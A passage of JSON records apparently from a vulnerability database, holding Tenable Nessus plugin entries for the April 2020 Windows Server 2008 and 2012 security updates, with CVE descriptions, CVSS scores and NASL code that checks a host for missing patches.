objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550957: Windows Server 2008 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0938", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1014", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550951.NASL", "href": "https://www.tenable.com/plugins/nessus/135470", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135470);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0957\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\"\n );\n script_xref(name:\"MSKB\", value:\"4550957\");\n script_xref(name:\"MSKB\", value:\"4550951\");\n script_xref(name:\"MSFT\", value:\"MS20-4550957\");\n script_xref(name:\"MSFT\", value:\"MS20-4550951\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550957: Windows Server 2008 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550957\nor cumulative update 4550951. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1007)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\");\n # https://support.microsoft.com/en-us/help/4550957/windows-server-2008-update-kb4550957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e700ec83\");\n # https://support.microsoft.com/en-us/help/4550951/windows-server-2008-update-kb4550951\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e9a49f43\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550957 or Cumulative Update KB4550951.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550951', '4550957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550951, 4550957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-05T14:16:16", "description": "The remote Windows host is missing security update 4550971 or cumulative update 4550917. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550971: Windows Server 2012 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0938", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550917.NASL", "href": "https://www.tenable.com/plugins/nessus/135465", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135465);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\"\n );\n script_xref(name:\"MSKB\", value:\"4550971\");\n script_xref(name:\"MSKB\", value:\"4550917\");\n script_xref(name:\"MSFT\", value:\"MS20-4550971\");\n script_xref(name:\"MSFT\", value:\"MS20-4550917\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550971: Windows Server 2012 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550971\nor cumulative update 4550917. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n 